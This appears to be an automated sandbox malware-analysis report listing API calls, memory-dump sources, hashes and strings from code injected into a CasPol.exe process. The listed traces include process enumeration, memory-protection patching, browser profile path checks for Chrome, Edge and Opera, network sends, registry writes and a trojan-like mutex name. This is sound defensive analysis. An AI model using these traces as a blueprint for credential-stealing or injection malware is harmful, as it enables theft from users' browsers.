• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressProc$ErrorLastLibraryLoad
• String ID: /json$GET$WebClient/1.0$localhost
• API String ID: 856020675-4094957224
• Opcode ID: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
• Instruction ID: 91aef2c0181b5b02629918c2efa78feadcfe58d8f36eafdb9b4bf9d8472914fd
• Opcode Fuzzy Hash: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
• Instruction Fuzzy Hash: 6761C470A00259ABFB11EFA4CC99FEEBBB8FF05380F20811AF505A7195DB746905CB61
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
• Process32FirstW.KERNEL32(00000000,?), ref: 10007744
• CloseHandle.KERNEL32(00000000), ref: 1000774F
• Process32NextW.KERNEL32(?,0000022C), ref: 1000784F
• CloseHandle.KERNEL32(?), ref: 10007861
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 1789362936-0
• Opcode ID: 550c526438bf7204cbee193e80a4b25de3c59c2eb0d9c386291f43524615945c
• Instruction ID: d2bc65c811ca1ef7753ae95508b0a0770518ab985600e5889df07c8cfc886717
• Opcode Fuzzy Hash: 550c526438bf7204cbee193e80a4b25de3c59c2eb0d9c386291f43524615945c
• Instruction Fuzzy Hash: 3751B272D04219DBEB20CF98C888BAEB7F5FB48790F218259E81DA7384DB755D45CB90
APIs
• GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
• GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
  • Part of subcall function 1002179D: GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
  • Part of subcall function 1002179D: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
  • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
  • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: 4dfc22582bc64b54c20ad08069fe92d14ded4e54327acf5c4b826402577880af
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: 6E214B2E50C2C26FEB11CBB46C817E66FE8CB772A0F654696E440CB143DDA95846D3B2
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?), ref: 10007A5B
• GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 10007A6C
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF), ref: 10007AB8
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AC4
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AD2
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: File$CloseHandle$CreateReadSize
• String ID:
• API String ID: 3664964396-0
• Opcode ID: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
• Instruction ID: 1c9cee4698dd12d9c6f9fbc702e91760a2e2c8769d39cee738bd46e8f50a0180
• Opcode Fuzzy Hash: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
• Instruction Fuzzy Hash: A211C431B00310BBF7309F689C89F5A77ACFB867A0F200549F90A972D1D7B45A41C7A2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(0457C7DD), ref: 0457C7E6
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,0457C7DD), ref: 0457C838
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0457C860
                                                                                                                                                                                                                                    • Part of subcall function 0457C803: GetProcAddress.KERNEL32(00000000,0457C7F4), ref: 0457C804
                                                                                                                                                                                                                                    • Part of subcall function 0457C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0457C7F4,0457C7DD), ref: 0457C816
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2080333215-0
                                                                                                                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                  • Instruction ID: b2b732c12adc45942d30c492e9b4539ece87820a7937235096ac0123369ecb07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C016D015452423CBB236A743C08EBA5F98BB53764B140B76E001DB193D95CF101F3F5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2152742572-0
                                                                                                                                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                  • Instruction ID: 73f11cf717d891ec8680d3d8ccba2c06736fe3b4cafecf77f1fc2b5b54d6cdbe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0C24EA4924239EA21C5B43C82AFB4FDCCB771A0BA00A52F500C7183DC95890A93F1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 1000634E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
                                                                                                                                                                                                                                  • API String ID: 1174141254-1866107781
                                                                                                                                                                                                                                  • Opcode ID: d4c97370cde720a617b6f654919f9fd5f379b49c00f622e63597d2ecc3da5d5c
                                                                                                                                                                                                                                  • Instruction ID: f5c5b1796602c674d072fdb72fdb3b9a68742e2cf3b4b57e043f71f885765a41
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c97370cde720a617b6f654919f9fd5f379b49c00f622e63597d2ecc3da5d5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41DF74D10204EBEB00DFA8DC44BEEB7BAFF44784F60451DF406A7294DB38AA058BA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000288,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(00000288,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                                                                  • String ID: LAL
                                                                                                                                                                                                                                  • API String ID: 3963590051-3302426157
                                                                                                                                                                                                                                  • Opcode ID: 3018c180087309ad1eb3199aa252a263549720f9ff09c772ecd713a729db881a
                                                                                                                                                                                                                                  • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3018c180087309ad1eb3199aa252a263549720f9ff09c772ecd713a729db881a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
• Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
• Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
• Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
• Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
• Opcode ID: 97aef63822e23c71db2d4dcd8e0f1fc2e443363f68162fc9169cf47362294f8a
• Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
• Opcode Fuzzy Hash: 97aef63822e23c71db2d4dcd8e0f1fc2e443363f68162fc9169cf47362294f8a
• Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
APIs
• GetModuleHandleA.KERNEL32(?,0457C7DD), ref: 0457C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0457C860
  • Part of subcall function 0457C7E6: GetModuleHandleA.KERNEL32(0457C7DD), ref: 0457C7E6
  • Part of subcall function 0457C7E6: GetProcAddress.KERNEL32(00000000,0457C7F4), ref: 0457C804
  • Part of subcall function 0457C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0457C7F4,0457C7DD), ref: 0457C816
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: AddressHandleModuleProc$ProtectVirtual
• String ID:
• API String ID: 2080333215-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: 061bbc17fd86e03722ce428a84da3f98bf202b38da5fb623e1250826bc9c3a2c
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: 8F2127224082826FFB238BB47C04BB66FD8BB53364F180AB6D040DB143D5ACA445E3A6
APIs
• GetProcAddress.KERNEL32(00000000,0457C7F4), ref: 0457C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0457C7F4,0457C7DD), ref: 0457C816
• GetModuleHandleA.KERNEL32(?,0457C7DD), ref: 0457C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0457C860
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: AddressProc$HandleModuleProtectVirtual
• String ID:
• API String ID: 2492872976-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: 52079f79515ed998600fe69fe78044496f3cfd8221067892db0e1ed90b83099b
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: CEF022016452413CFB2349B43C44EBA5FCCAB67320B140A72E001CB183D89CA506B3F2
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
• CloseHandle.KERNEL32(00000000), ref: 0041B67A
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
• Opcode ID: ec720e96a51d184a4cda6b10cf2afb75cf85eefae2366cccc72a2835be63d5f5
• Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
• Opcode Fuzzy Hash: ec720e96a51d184a4cda6b10cf2afb75cf85eefae2366cccc72a2835be63d5f5
• Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
• Opcode ID: d32db71f486a6fab95b209cf5825fc6a662c6458aed09740a1026ad9af6751ae
• Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
• Opcode Fuzzy Hash: d32db71f486a6fab95b209cf5825fc6a662c6458aed09740a1026ad9af6751ae
• Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10008357
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10008361
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• API String ID: 909987262-2556327735
APIs
• PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 100060BB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• API String ID: 1174141254-2800177040
APIs
• PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,0000001C,00000000,-00000002,00000000), ref: 100061BB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable
• API String ID: 1174141254-1162561444
APIs
• PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 1000644B
Strings
• \Microsoft\Edge\Application\msedge.exe, xrefs: 1000642B
• ProgramFiles, xrefs: 100063D6
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
• API String ID: 1174141254-1265440269
APIs
• PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 10005FBB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-EC111K
• API String ID: 1925916568-165843323
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 100044DE
  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
• new.LIBCMT ref: 100044E4
• new.LIBCMT ref: 100044F8
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3598223435-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
